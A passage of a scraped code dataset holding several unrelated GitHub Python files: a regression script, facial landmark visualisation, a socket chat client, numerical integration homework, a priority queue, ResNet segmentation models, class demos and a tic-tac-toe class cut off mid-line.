\"feature.pkl\"\n data = pd.read_csv(self.data_loc)\n data[\"original\"].str.lower()\n data[\"edit\"].str.lower()\n\n feature_cols = [\"original\", \"edit\"]\n X = data[feature_cols]\n y = data[[\"meanGrade\"]]\n\n transformer = TfidfTransformer()\n vectorizer = TfidfVectorizer(decode_error=\"replace\",\n vocabulary=pickle.load(open(fileneame2, \"rb\")))\n X_o = vectorizer.fit_transform(X[\"original\"], X[\"edit\"])\n linreg = pickle.load(open(filename1, \"rb\"))\n pred = linreg.predict(X_o)\n lis1 = y[\"meanGrade\"].values.tolist()\n print_data = X\n print_data[\"meanGrade\"] = lis1\n print_data[\"PredGrade\"] = pred\n lis2 = print_data.values.tolist()\n\n for i in lis2:\n print(\"original:\",i[0], \"Edited Word:\", i[1], \"Mean Grade:\",i[2], \"Prediction:\",i[3])\n # print(\"original:\",i[0], \"Edited Word:\", i[1], \"Prediction:\",i[2])\n print('Mean squared error: %.2f'\n % sqrt(mean_squared_error(y, pred)))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-tr\", \"--train\", dest = \"tr\", help=\"Training Mode\")\n parser.add_argument(\"-te\", \"--test\", dest = \"te\", help=\"Testing Mode\")\n parser.add_argument(\"-m\", \"--model\", dest = \"m\", help=\"Path of Model\")\n parser.add_argument(\"-ds\", \"--dataset\", dest = \"ds\", help=\"Path of Dataset\")\n parser.add_argument(\"-tts\", \"--train_test_split\", dest = \"tts\", help=\"Split Ratio\")\n\n args = parser.parse_args()\n if args.tr != None:\n try:\n data = args.ds\n model = args.m\n lr = LinReg(data)\n except:\n print(\"Format is: -ds ./data/file -m ./model/ -tts optional\")\n lr.train_data(model, args.tts)\n elif args.te != None:\n try:\n data = args.ds\n model = args.m\n lr = LinReg(data)\n except:\n print(\"Format is: -ds ./data/file -m ./model/\")\n lr.test_data(model)\n else:\n print(\"Oops, invalid command!\")\n","repo_name":"shivamkumarsingh114/NLP-Project","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"20862646153","text":"#input one image\n#detect facial landmarks\n#show image with detected facial landmarks\n#show image with normalized facial landmarks\n\n\nimport cv2\nimport numpy as np\n\nfrom FacialLandmarkDetection import *\nfrom Database_loader import *\n\n\n#shows image inside a windows\ndef showImage_more(img,text, gray=False):\n if gray==True:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n cv2.putText(img,text , (20, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 1, cv2.LINE_AA)\n window_name = \"window_\" + text\n cv2.imshow(window_name,img)\n #cv2.waitKey(0)\n\n\nif __name__ == \"__main__\":\n \n templates_database = \"/home/matej/Diplomski/baze/Templates/baza_templates\"\n imagePath_same1 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/000/000_1_1.ppm\"\n imagePath_same2 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/003/003_1_1.ppm\"\n imagePath_same3 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/004/004_1_1.ppm\"\n imagePath_same4 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/041/041_1_1.ppm\"\n imagePath_same5 = \"/home/matej/Diplomski/baze/baze_original/baza_XMVTS2/134/134_1_1.ppm\"\n \n image_path_man_no_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/man_no_glasses/143_1_1.ppm\"\n image_path_man_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/man_glasses/113_1_1.ppm\"\n image_path_woman_no_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/woman_no_glasses/154_1_1.ppm\"\n image_path_woman_glasses = \"/home/matej/Diplomski/baze/deidentification_database/Deidentification_main/woman_glasses/250_1_1.ppm\"\n \n imagePath = image_path_man_glasses #chose image to use!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n \n \n destination_deident = \"\"\n \n #show original image\n detector = FacialLandmarkDetector(imagePath)\n \n #get landmarks drawn on image\n image_original = detector.detectFacialLandmarks_get_image()\n showImage_more(img=image_original, text=\"original\", gray=False)\n \n #get landmarks on black background\n image_landmarks = detector.detectFacialLandmarks(draw=False, normalize=False)\n \n image_orig_black_white = np.zeros((image_original.shape[0], image_original.shape[1]), dtype=np.float64)\n \n for position in image_landmarks:\n cv2.circle(image_orig_black_white,(position[0],position[1]), 3, (1,1,1), -1)\n \n showImage_more(img=image_orig_black_white, text=\"black_white\", gray=False)\n \n #get normalized landmarks on black background\n image_landmarks_norm = detector.detectFacialLandmarks(draw=False, normalize=True)\n \n image_orig_black_white_norm = np.zeros((image_original.shape[0], image_original.shape[1]), dtype=np.float64)\n \n \n for position in image_landmarks_norm:\n x = ((position[0] * (image_original.shape[0]/4))+image_original.shape[0]/4).astype(np.int32)\n y = ((position[1] * (image_original.shape[0]/4))+image_original.shape[0]/4).astype(np.int32)\n \n cv2.circle(image_orig_black_white_norm,(x,y), 3, (1,1,1), -1)\n \n showImage_more(img=image_orig_black_white_norm, text=\"black_white_norm\", gray=False)\n\n \n #show template images\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","repo_name":"matejcrnac/Face_deidentification_kazemi","sub_path":"facial_landmarks_normalized_visualization.py","file_name":"facial_landmarks_normalized_visualization.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"69958800189","text":"import socket\nfrom colorama import Fore\nimport threading\nimport pathlib\nimport os\n\nBASEDIR = pathlib.Path(__file__).parent\n\nPORT = 9091 # server port\nHOST = \"localhost\" # server id\nSEP = \"<&sep&>\" # seperator for seperating data in a single send\nBUFFER_SIZE = 1024\nDOWNLOAD_FOLDER = BASEDIR / \"downloads\"\n\n\n# creat folder if not exist\nif not DOWNLOAD_FOLDER.exists():\n DOWNLOAD_FOLDER.mkdir()\n\n\ndef resive_msg(soc: socket):\n while True:\n # get msg from server and process it\n msg = soc.recv(BUFFER_SIZE)\n if not msg:\n soc.close()\n break\n msg = msg.decode(\"utf-8\").split(SEP)\n if msg[0] == \"JOIN\":\n # somebody joind the group chat\n msg = msg[1]\n print(Fore.YELLOW + msg)\n print(Fore.BLUE)\n elif msg[0] == \"DISCONNET\":\n # sombody left group chat\n msg = msg[1]\n print(Fore.RED + msg)\n print(Fore.BLUE)\n elif msg[0] == \"ERROR\":\n # error msg , didint acctually use it\n msg = msg[1]\n print(Fore.RED + msg)\n print(Fore.BLUE)\n elif msg[0] == \"SENDINGFILE\":\n # recive file from client\n file_name = msg[1]\n file_size = int(msg[2])\n with open(DOWNLOAD_FOLDER / file_name, \"wb\") as file:\n current_size = 0\n while current_size < file_size:\n msg = soc.recv(BUFFER_SIZE)\n file.write(msg)\n current_size += len(msg)\n print(Fore.GREEN + f\"recived file {file_name}\")\n print(Fore.BLUE)\n else:\n # sombody sad something in chat\n print(Fore.GREEN + msg[0] + \": \" + Fore.MAGENTA + msg[1])\n print(Fore.BLUE)\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc:\n soc.connect((HOST, PORT))\n msg = soc.recv(BUFFER_SIZE).decode(\"utf-8\")\n if msg == \"NICK\":\n # send nickname\n nick = input(\"Enter Nickname:\")\n soc.send(nick.encode(\"utf-8\"))\n # handle reciving msg from server on another thread\n t = threading.Thread(target=resive_msg, args=(soc,))\n t.daemon = True\n t.start()\n while True:\n msg = input(\"\")\n # exist if typed\n if msg == \"exit()\":\n soc.close()\n break\n # send file to server\n # handeld here\n elif msg.split(\":\")[0] == \"sfile\":\n file_path = msg.split(\":\")[1].replace('\"', \"\").replace(\"'\", \"\")\n file_name = os.path.basename(file_path)\n file_size = os.path.getsize(file_path)\n soc.send(f\"SENDFILE{SEP}{file_name}{SEP}{file_size}\".encode(\"utf-8\"))\n with open(file_path, \"rb\") as file:\n line = file.read(BUFFER_SIZE)\n while line:\n soc.send(line)\n line = file.read(BUFFER_SIZE)\n print(Fore.GREEN + f\"Sending file {file_name} done\")\n continue\n # recive file from server handeled in resive_msg\n elif msg.split(\":\")[0] == \"gfile\":\n file_name = msg.split(\":\")[1]\n soc.send(f\"REQUESTFILE{SEP}{file_name}\".encode(\"utf-8\"))\n else:\n # user typed a msg for chat\n soc.send(msg.encode(\"utf-8\"))\n\n else:\n print(\"failed\")\n soc.close()\n","repo_name":"amiravtar/socket_chat","sub_path":"python/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"211309087","text":"'''\nAuthor: Jason Li\nAssignment: Scientific Computing HW1\nProfessor: DuPont\nDate: 10/2/2017\n'''\n\nimport matplotlib.pyplot as plt\n\nimport numpy\nimport math\n\ndef function1(x):\n\treturn x**2\n\ndef function2(x):\n\treturn math.sqrt(math.sin(math.pi*(x/2)))\n\ndef function3(x):\n\treturn x**4\n\ndef function4(x):\n\tif(x < 1.0/3.0):\n\t\treturn 1\n\telse:\n\t\treturn 0\n\nmaxLevel = 0\nnumFunctCalls = 0\ngoodInterval = []\ngoodMidpoint = []\n\ndef recursion(mathFunct, a, b, tolerance, level, coarseArea=None):\n\tglobal numFunctCalls\n\tglobal maxLevel\n\tglobal goodInterval\n\tglobal goodMidpoint\n\tmidpoint = (a + b) / 2.0\n\tif coarseArea is None:\n\t\tcoarseArea = mathFunct(midpoint) * (b - a)\n\t\tnumFunctCalls += 1\n\n\tfineLeft = mathFunct((a + midpoint) / 2.0) * (midpoint - a)\n\tfineRight = mathFunct((b + midpoint) / 2.0) * (b - midpoint)\n\tfineArea = fineLeft + fineRight\n\tinterval = b-a\n\tgoodInterval.append(interval)\n\tgoodMidpoint.append(midpoint)\n\tnumFunctCalls += 2\n\tlevel += 1\n\tif level >= 30:\n\t\tmaxLevel = 30\n\t\treturn fineArea\n\tif level < 4:\n\t\treturn recursion(mathFunct, a, midpoint, tolerance / 2.0, level, coarseArea=fineLeft) + recursion(mathFunct, midpoint, b, tolerance / 2.0, level, coarseArea=fineRight)\n\tif abs(float(coarseArea) - float(fineArea)) <= tolerance:\n\t\tif level >= maxLevel:\n\t\t\tmaxLevel = level\n\t\treturn fineArea\n\telse:\n\t\treturn recursion(mathFunct, a, midpoint, tolerance / 2.0, level, coarseArea=fineLeft) + recursion(mathFunct, midpoint, b, tolerance / 2.0, level, coarseArea=fineRight)\n\ndef plotEvals(mathFunct, a, b):\n\tglobal numFunctCalls\n\tglobal maxLevel\n\tplotData = []\n\ttols = [0.01, 0.003, 0.001, 0.0003, 0.0001, 0.00003, 0.00001, 0.000003, 0.000001]\n\tfor tol in tols:\n\t\tplotData.append([recursion(mathFunct, a, b, tol, 0), numFunctCalls])\n\t\tnumFunctCalls = 0\n\t\tmaxLevel = 0\n\n\tlogNumFunctCalls = [math.log(x[1]) for x in plotData]\n\tlogTol = [math.log(1/x) for x in tols]\n\tplt.plot(logTol, logNumFunctCalls)\n\tplt.title(mathFunct)\n\tplt.xlabel(\"log of inverse tolerance\")\n\tplt.ylabel(\"log of inverse of num function evals\")\n\tplt.show()\n\nplotEvals(function1, 0, 2)\nplotEvals(function2, 0, 1)\nplotEvals(function3, -1, 1)\nplotEvals(function4, 0, 1)\n\ndef plotError(mathFunct, a, b):\n\tglobal numFunctCalls\n\tglobal maxLevel\n\tlogErrors = []\n\tplotData = []\n\tlowTol = 0.0000000001\n\ttols = [0.01, 0.003, 0.001, 0.0003, 0.0001, 0.00003, 0.00001, 0.000003, 0.000001]\n\tactualValue = recursion(mathFunct, a, b, lowTol, 0)\n\tprint(actualValue)\n\tfor tol in tols:\n\t\tactError = abs (recursion(mathFunct, a, b, tol, 0) - actualValue)\n\t\tplotData.append(actError)\n\t\tprint(actError)\n\t\tnumFunctCalls = 0\n\t\tmaxLevel = 0\n\n\tfor x in plotData:\n\t\ttry:\n\t\t\tlogErrors.append(math.log(1.0/x))\n\t\texcept:\n\t\t\tlogErrors.append(numpy.inf)\n\n\tlogTol = [math.log(1.0/x) for x in tols]\n\n\n\tplt.plot(logTol, logErrors)\n\tplt.title(mathFunct)\n\tplt.xlabel(\"log of inverse tolerance\")\n\tplt.ylabel(\"log of inverse actual error\")\n\tplt.show()\n\nplotError(function1, 0, 2)\nplotError(function2, 0, 1)\nplotError(function3, -1, 1)\nplotError(function4, 0, 1)\n\ndef plotGoodInterval(mathFunct, a, b):\n\tglobal goodInterval\n\tglobal goodMidpoint\n\thardTol = 0.0003\n\n\tgoodInterval = []\n\tgoodMidpoint = []\n\tlogInterval = []\n\n\trecursion(mathFunct, a, b, hardTol, 0)\n\tfor x in goodInterval:\n\t\tlogInterval.append(-math.log(x))\n\n\tplt.plot(goodMidpoint, goodInterval)\n\tplt.title(mathFunct)\n\tplt.xlabel(\"x position\")\n\tplt.ylabel(\"negative log of good interval\")\n\tplt.show()\n\nplotGoodInterval(function1, 0, 2)\nplotGoodInterval(function2, 0, 1)\nplotGoodInterval(function3, -1, 1)\nplotGoodInterval(function4, 0, 1)\n","repo_name":"jasonli2310/scientific-computing","sub_path":"assignment1.py","file_name":"assignment1.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21807592036","text":"# A max priority queue abstract data type to insert pairs of the form (datum, priority).\n# If a pair is inserted with a datum that already occurs in the priority queue, then\n# the priority is (possibly) changed to the (possibly) new value.\n#\n# Written by Eric Martin for COMP9021\n\n\nMIN_CAPACITY = 10\n\n\nclass PriorityQueue():\n def __init__(self, capacity = MIN_CAPACITY):\n self._data = [None] * capacity\n self._length = 0\n self._locations = {}\n \n def __len__(self):\n return self._length\n\n def is_empty(self):\n return self._length == 0\n\n def insert(self, element):\n datum = element[0]\n priority = element[1]\n if datum in self._locations:\n self._change_priority(datum, priority)\n return\n if self._length + 1 == len(self._data):\n self._resize(2 * len(self._data))\n self._length += 1\n self._data[self._length] = [datum, priority]\n self._locations[datum] = self._length\n self._bubble_up(self._length)\n\n def delete(self):\n top_datum = self._data[1][0]\n del self._locations[top_datum] \n self._data[1], self._data[self._length] = self._data[self._length], self._data[1]\n self._length -= 1\n if MIN_CAPACITY <= self._length <= len(self._data) // 4:\n self._resize(len(self._data) // 2)\n self._bubble_down(1)\n return top_datum\n\n def _change_priority(self, datum, priority):\n i = self._locations[datum]\n if priority > self._data[i][1]:\n self._data[i][1] = priority\n self._bubble_up(i)\n elif priority < self._data[i][1]:\n self._data[i][1] = priority\n self._bubble_down(i)\n self._bubble_up(i)\n \n def _bubble_up(self, i):\n if i > 1 and self._data[i][1] > self._data[i // 2][1]:\n self._data[i // 2], self._data[i] = self._data[i], self._data[i // 2]\n self._locations[self._data[i // 2][0]] = i // 2\n self._locations[self._data[i][0]] = i\n self._bubble_up(i // 2)\n\n def _bubble_down(self, i):\n child = 2 * i\n if child < self._length and self._data[child + 1][1] > self._data[child][1]:\n child += 1\n if child <= self._length and self._data[child][1] > self._data[i][1]:\n self._data[child], self._data[i] = self._data[i], self._data[child]\n self._locations[self._data[child][0]] = child\n self._locations[self._data[i][0]] = i\n self._bubble_down(child)\n\n def _resize(self, new_size):\n self._data = list(self._data[ : self._length + 1]) + [None] * (new_size - self._length - 1)\n \n\nif __name__ == '__main__':\n pq = PriorityQueue()\n L = [('A', 13), ('B', 13), ('C', 4), ('D', 15), ('E', 9), ('F', 4), ('G', 5), ('H', 14),\n ('A', 4), ('B', 11), ('C', 15), ('D', 2), ('E', 17),\n ('A', 8), ('B', 14), ('C',12), ('D', 9), ('E', 5),\n ('A', 6), ('B', 16)]\n for e in L:\n pq.insert(e)\n for i in range(8):\n print(pq.delete(), end = ' ')\n print()\n print(pq.is_empty())\n \n \n \n","repo_name":"iteong/comp9021-principles-of-programming","sub_path":"labs/Lab_11_solutions/extended_priority_queue.py","file_name":"extended_priority_queue.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"6"} +{"seq_id":"28556915084","text":"def factorial(n):\n # n! can also be fined as n * (n-1)\n\n if n <= 1:\n return 1\n else:\n return n * factorial(n - 1)\n\n\ntry:\n print(factorial(900))\nexcept (RecursionError, OverflowError):\n print(\"This program can't calculate factorials that large\")\n\nprint(\"Program done\")\n","repo_name":"ndrichter/udemy_python","sub_path":"exception_handling/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"23155483860","text":"# import torch\n# import torch.nn as nn\n# import torch.optim as optim\n# import torch.nn.functional as F\n# import torchvision\n# import torchvision.transforms as transforms\n# from torch.utils.data import Dataset, DataLoader\n# import torchvision.models as models\n# import glob\n# import os.path as osp\n\n# class Resnet18(nn.Module):\n# def __init__(self):\n \n# super(Resnet18, self).__init__()\n \n# # Load the pretrained weights\n# resnet18 = models.resnet18(pretrained=True)\n# #took out last block, avgpool, and linear layer of ResNet 18\n# modules = list(resnet18.children())[0:7]\n# # last block of Resnet 18\n# modules += [nn.Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2), bias=False),\n# nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),\n# nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),\n# nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),\n# nn.ReLU(),\n# nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),\n# nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)]\n# self.resnet18=nn.Sequential(*modules)\n# self.upsample1 = nn.ConvTranspose2d(512, 512, 3, stride=4, padding = 2)\n# self.conv1 = nn.Conv2d(512, 256, (3, 3), padding = 1, bias=True)\n# self.relu1 = nn.ReLU()\n# self.conv2 = nn.Conv2d(256, 256, (3, 3), padding = 1, bias=True)\n# self.relu2 = nn.ReLU()\n# self.upsample2 = nn.ConvTranspose2d(256, 256, 3, stride=2)\n# self.conv3 = nn.Conv2d(256, 128, (3, 3), padding = 1, bias=True)\n# self.relu3 = nn.ReLU()\n# self.conv4 = nn.Conv2d(128, 128, (3, 3), padding = 1, bias=True)\n# self.relu4 = nn.ReLU()\n# self.upsample3 = nn.ConvTranspose2d(128, 128, 3, stride=2)\n# self.conv5 = nn.Conv2d(128, 64, (3, 3), padding = 1, bias=True)\n# self.relu5 = nn.ReLU()\n# self.conv6 = nn.Conv2d(64, 64, (3, 3), padding = 1, bias=True)\n# self.relu6 = nn.ReLU()\n# self.upsample4 = nn.ConvTranspose2d(64, 35, 3, stride=2)\n \n \n# def forward(self, x):\n \n# input_spatial_dim = x.size()[2:]\n \n# x = self.resnet18(x)\n# x = self.upsample1(x)\n# x = self.conv1(x)\n# x = self.relu1(x)\n# x = self.conv2(x)\n# x = self.relu2(x)\n# x = self.upsample2(x)\n# x = self.conv3(x)\n# x = self.relu3(x)\n# x = self.conv4(x)\n# x = self.relu4(x)\n# x = self.upsample3(x)\n# x = self.conv5(x)\n# x = self.relu5(x)\n# x = self.conv6(x)\n# x = self.relu6(x) \n# x = self.upsample4(x)\n# x = nn.functional.upsample(input = x, size = input_spatial_dim, mode = 'bilinear', align_corners = True)\n# return x\n \n \nimport torch\nimport torch.nn as nn\nimport torchvision\n\n\nclass Resnet18_8s(nn.Module):\n \n # Achieved ~57 on pascal VOC\n \n def __init__(self, num_classes=35):\n \n super(Resnet18_8s, self).__init__()\n \n # Load the pretrained weights, remove avg pool\n # layer and get the output stride of 8\n self.resnet18 = torchvision.models.resnet18(pretrained=True)\n modules = list(self.resnet18.children())[0:-1]\n resnet18_32s=nn.Sequential(*modules)\n \n \n # Create a linear layer -- we don't need logits in this case\n resnet18_32s.fc = nn.Sequential()\n \n self.resnet18_32s = resnet18_32s\n \n self.score_32s = nn.Conv2d(512,\n num_classes,\n kernel_size=1)\n \n self.score_16s = nn.Conv2d(256,\n num_classes,\n kernel_size=1)\n \n self.score_8s = nn.Conv2d(128,\n num_classes,\n kernel_size=1)\n \n \n def forward(self, x):\n \n input_spatial_dim = x.size()[2:]\n \n x = self.resnet18.conv1(x)\n x = self.resnet18.bn1(x)\n x = self.resnet18.relu(x)\n x = self.resnet18.maxpool(x)\n\n x = self.resnet18.layer1(x)\n \n x = self.resnet18.layer2(x)\n logits_8s = self.score_8s(x)\n \n x = self.resnet18.layer3(x)\n logits_16s = self.score_16s(x)\n \n x = self.resnet18.layer4(x)\n logits_32s = self.score_32s(x)\n \n logits_16s_spatial_dim = logits_16s.size()[2:]\n logits_8s_spatial_dim = logits_8s.size()[2:]\n \n logits_16s += nn.functional.upsample(logits_32s,\n size=logits_16s_spatial_dim, mode = 'bilinear', align_corners = True)\n \n logits_8s += nn.functional.upsample(logits_16s,\n size=logits_8s_spatial_dim, mode = 'bilinear', align_corners = True)\n \n logits_upsampled = nn.functional.upsample(input = logits_8s,\n size=input_spatial_dim, mode = 'bilinear', align_corners = True)\n \n return logits_upsampled\n\n \nclass Resnet50_8s(nn.Module):\n \n \n def __init__(self, num_classes=35):\n \n super(Resnet50_8s, self).__init__()\n \n \n # Load the pretrained weights, remove avg pool\n # layer and get the output stride of 8\n self.resnet50 = torchvision.models.resnet50(pretrained=True)\n modules = list(self.resnet50.children())[0:-1]\n resnet50_32s=nn.Sequential(*modules)\n \n \n # Create a linear layer -- we don't need logits in this case\n resnet50_32s.fc = nn.Sequential()\n \n self.resnet50_32s = resnet50_32s\n \n self.score_32s = nn.Conv2d(2048 ,\n num_classes,\n kernel_size=1)\n \n self.score_16s = nn.Conv2d(1024,\n num_classes,\n kernel_size=1)\n \n self.score_8s = nn.Conv2d(512,\n num_classes,\n kernel_size=1)\n \n \n def forward(self, x):\n \n input_spatial_dim = x.size()[2:]\n \n x = self.resnet50.conv1(x)\n x = self.resnet50.bn1(x)\n x = self.resnet50.relu(x)\n x = self.resnet50.maxpool(x)\n\n x = self.resnet50.layer1(x)\n \n x = self.resnet50.layer2(x)\n logits_8s = self.score_8s(x)\n \n x = self.resnet50.layer3(x)\n logits_16s = self.score_16s(x)\n \n x = self.resnet50.layer4(x)\n logits_32s = self.score_32s(x)\n \n logits_16s_spatial_dim = logits_16s.size()[2:]\n logits_8s_spatial_dim = logits_8s.size()[2:]\n \n logits_16s += nn.functional.upsample(logits_32s,\n size=logits_16s_spatial_dim, mode = 'bilinear', align_corners = True)\n \n logits_8s += nn.functional.upsample(logits_16s,\n size=logits_8s_spatial_dim, mode = 'bilinear', align_corners = True)\n \n logits_upsampled = nn.functional.upsample(logits_8s, size=input_spatial_dim, mode = 'bilinear', align_corners = True)\n \n return logits_upsampled","repo_name":"Ameliabqy/CS231N_Project","sub_path":"code/models/ResNet.py","file_name":"ResNet.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31534018786","text":"needed_money = int(input())\npayment = 1\ntotal_payments_amount = 0\namount_payment_cash = 0\namount_payment_card = 0\ncash_payments = 0\ncard_payments = 0\naverage_cash_payments = 0\naverage_card_payments = 0\ncurrent_item_price = input()\nwhile current_item_price != \"End\" and total_payments_amount < needed_money:\n item_price = int(current_item_price)\n if payment == 1:\n if item_price > 100:\n print(\"Error in transaction!\")\n payment += 1\n else:\n print(\"Product sold!\")\n amount_payment_cash += item_price\n total_payments_amount += item_price\n payment += 1\n cash_payments += 1\n elif payment == 2:\n if item_price < 10:\n print(\"Error in transaction!\")\n payment = 1\n else:\n print(\"Product sold!\")\n amount_payment_card += item_price\n total_payments_amount += item_price\n card_payments += 1\n payment = 1\n if total_payments_amount < needed_money:\n current_item_price = input()\nif total_payments_amount < needed_money:\n print(\"Failed to collect required money for charity.\")\nelif total_payments_amount >= needed_money:\n average_cash_payments = amount_payment_cash / cash_payments\n average_card_payments = amount_payment_card / card_payments\n print(f\"Average CS: {average_cash_payments:.2f}\")\n print(f\"Average CC: {average_card_payments:.2f}\")\n","repo_name":"iliyan-pigeon/Soft-uni-Courses","sub_path":"programming_basics_python/while_loops_more_exercises/report_system.py","file_name":"report_system.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25081101460","text":"from person import Person\n\nclass Student(Person): # Студент является человеком, поэтому наследует базовый класс человека\n faculty = None\n marks = None # Оценки будут в виде словаря, где ключом является предмет, значением - список оценок\n\n def __init__(self, name: str, year: int, id: int, faculty: str, subject_list: list=None) -> None:\n super().__init__(name, year, id) # Сначала запускаем init у класса-родителя чтобы задать базовые параметры человека\n self.faculty = faculty\n self.marks = dict()\n if subject_list is not None: # Если при создании студента указан набор предметов, то также инициализируем их в журнале оценок\n for subject in subject_list:\n self.add_subject(subject)\n\n \n def add_subject(self, subject: str): # Метод для записи на предмет, т.е. добавление его в журнал для оценок\n self.marks[subject] = list()\n\n def get_marks(self):\n print(f\"{self.name}'s marks:\")\n for subject in self.marks.keys():\n print(f'{subject}: {self.marks[subject]}')\n \n\nclass Teacher(Person): # Класс преподавателя. Нужен для взаимодействия со студентами\n subject = None # Предмет, который преподаётся. Значение используется для проставления оценок студентам\n\n def __init__(self, name: str, year: int, id: int, subject: str) -> None:\n super().__init__(name, year, id)\n self.subject = subject\n\n def give_mark(self, student: Student, mark: int):\n if self.subject not in student.marks: # По предмету, который преподаётся учителем, проверяем, записан ли на него студент\n print('Студент не изучает данный предмет!')\n return\n student.marks[self.subject].append(mark) # Выставляется оценка в журнал студенту\n \n\n\nclass Assistant(Teacher, Student): # Пример наследования - ассистент. Он является как студентом, так и учителем по определённому предмету\n def __init__(self, name: str, year: int, id: int, faculty: str, subject: str, subject_list: list = None) -> None:\n Student.__init__(self, name=name, year=year, id=id, faculty=faculty, subject_list=subject_list) # В данном случае проще всего вызвать конструктор для студента, а поля для учителя заполнить в этом конструкторе\n self.subject = subject # Мы один раз инициализируем имя, id, и остальные параметры, поэтому здесь сначала задали у студента, затем добавили свои поля для учитяля. Можно вызвать и конструктор для учителя, но тогда поля студента нужно будет определять здесь\n","repo_name":"MVShukhman/Python_course","sub_path":"13 - OOP/school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10770427890","text":"# 2588번\na, b = map(int, input().split())\n\nprint(a * ((b) % 10))\nprint(a * ((b//10) % 10))\nprint(a * (b//100))\nprint(a*b)\n\n\n# 2884번\n\na, b = map(int, input().split())\n\nif b >= 45:\n print(a, b - 45)\nelif a > 0 and b < 45:\n print(a - 1, b + 15)\nelse:\n print(a + 23, b + 15)\n\n\n# 1110번\n# 26이면 2 + 6 = 8 = > 68\n\n# first_num % 10 은 6 first_num // 10 은 2\n# second_num = ((first_num % 10)*10) + (first_num // 10 + first_num % 10)\n\nnum = int(input())\n\ncheck_num = num\nnew = 0\na = 0\ncount = 0\n\nwhile True:\n a = num // 10 + num % 10\n new = (num % 10)*10 + a % 10\n count += 1\n num = new\n\n if new == check_num:\n break\n\nprint(count)\n","repo_name":"noh-yj/algorithm","sub_path":"1_week/prac1.py","file_name":"prac1.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25869938649","text":"from random import randint\n\n\nclass TicTacToe:\n \n \"\"\"\n Класс, описывающий игру в крестики-нолики.\n \"\"\"\n\n CROSS = '❌'\n\n \"\"\"\n Константа, хранящая символ крестика.\n \"\"\"\n\n ZERO = '🟢'\n\n \"\"\"\n Константа, хранящая символ нолика.\n \"\"\"\n\n EMPTY = ' '\n\n \"\"\"\n Константа, хранящая символ пустой клетки.\n \"\"\"\n\n WIN = 'win'\n\n \"\"\"\n Победа игрока.\n \"\"\"\n\n LOSE = 'lose'\n\n \"\"\"\n Поражение игрока.\n \"\"\"\n\n STOP = 'stop'\n\n \"\"\"\n Игра закончена.\n \"\"\"\n\n DRAW = 'draw'\n\n \"\"\"\n Ничья.\n \"\"\"\n\n NONE = 'none'\n\n \"\"\"\n Игра продолжается.\n \"\"\"\n\n __id: int\n\n \"\"\"\n Идентификатор игры.\n \"\"\"\n\n __field: list[str]\n\n \"\"\"\n Список, хранящий значения клеток игрового поля.\n \"\"\"\n\n __sign: str\n\n \"\"\"\n Символ игрока.\n \"\"\"\n\n __field_size: int\n\n \"\"\"\n Длина стороны игрового поля\n \"\"\"\n\n __lines: list[list[int]]\n\n \"\"\"\n Список, хранящий линии для проверки окончания игры.\n \"\"\"\n\n __win_line: int\n\n \"\"\"\n Колличество клеток для победы.\n \"\"\"\n\n def __init__(self, \n id: int, \n field: list[str] = None, \n sign: str = None, \n field_size: int = 3, \n win_line: int = 3) -> None:\n\n \"\"\"\n Инициализация объекта класса игры.\n \"\"\"\n\n self.__id = id\n self.__field = field if not field is None else [TicTacToe.EMPTY] * field_size * field_size\n self.__field_size = int(len(self.__field) ** 0.5)\n\n self.__win_line = win_line\n \n self.__lines = []\n\n for i in range(0, len(self.__field), self.__field_size):\n self.__lines.append(list(range(i, i + self.__field_size)))\n\n for i in range(0, self.__field_size):\n self.__lines.append(list(range(i, len(self.__field), self.__field_size)))\n\n starts = [i for i in range(self.__field_size - self.__win_line + 1)]\n for i in range(len(starts)):\n self.__lines.append([j for j in range(starts[i], len(self.__field), self.__field_size 